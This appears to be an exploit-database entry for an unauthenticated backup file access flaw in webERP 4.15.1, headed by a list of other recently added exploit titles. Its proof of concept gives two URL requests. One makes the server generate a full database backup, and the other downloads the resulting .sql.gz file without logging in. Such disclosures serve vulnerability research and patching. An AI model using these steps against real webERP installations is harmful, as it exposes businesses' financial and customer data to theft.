cc95715dc2
10 changes to exploits/shellcodes Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path Saltstack 3000.1 - Remote Code Execution BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection Fishing Reservation System 7.5 - 'uid' SQL Injection Online Scheduling System 1.0 - 'username' SQL Injection webERP 4.15.1 - Unauthenticated Backup File Access PhreeBooks ERP 5.2.5 - Remote Command Execution SimplePHPGal 0.7 - Remote File Inclusion NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration
26 lines
No EOL
1,016 B
Text
26 lines
No EOL
1,016 B
Text
# Exploit Title: webERP 4.15.1 - Unauthenticated Backup File Access
|
|
# Date: 2020-05-01
|
|
# Author: Besim ALTINOK
|
|
# Vendor Homepage: http://www.weberp.org
|
|
# Software Link: https://sourceforge.net/projects/web-erp/
|
|
# Version: v4.15.1
|
|
# Tested on: Xampp
|
|
# Credit: İsmail BOZKURT
|
|
|
|
--------------------------------------------------------------------------
|
|
About Software:
|
|
|
|
webERP is a complete web-based accounting and business management system
|
|
that requires only a web-browser and pdf reader to use. It has a wide range
|
|
of features suitable for many businesses particularly distributed
|
|
businesses in wholesale, distribution, and manufacturing.
|
|
|
|
-------------------------------------------------------
|
|
PoC Unauthenticated Backup File Access
|
|
---------------------------------------------
|
|
|
|
1- This file generates new Backup File:
|
|
http://localhost/webERP/BackUpDatabase.php
|
|
2- Someone can download the backup file from:
|
|
--
|
|
http://localhost/webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz |